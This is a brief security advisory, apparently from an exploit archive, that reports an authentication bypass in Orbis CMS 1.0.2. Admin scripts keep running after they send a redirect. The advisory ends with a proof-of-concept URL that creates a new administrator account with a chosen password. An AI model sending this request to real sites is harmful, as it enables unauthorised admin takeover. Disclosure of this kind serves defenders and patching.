------------------------------------------------------------------------ Software................Orbis 1.0.2 Vulnerability...........Authentication Bypass Download................http://www.novo-ws.com/orbis-cms/ Release Date............7/11/2010 Tested On...............Windows Vista + XAMPP ------------------------------------------------------------------------ Author..................John Leitch Site....................http://cross-site-scripting.blogspot.com/ Email...................john.leitch5@gmail.com ------------------------------------------------------------------------ --Description-- An authentication bypass vulnerability in Orbis 1.0.2 can be exploited to create a new admin. --Exploit-- Several admin related scripts fail to terminate after setting the header location field. --PoC-- http://localhost/orbis/admin/admin_users_create.php?nusern=new_admin&nuserp=Password1&nusert=2&nusere=@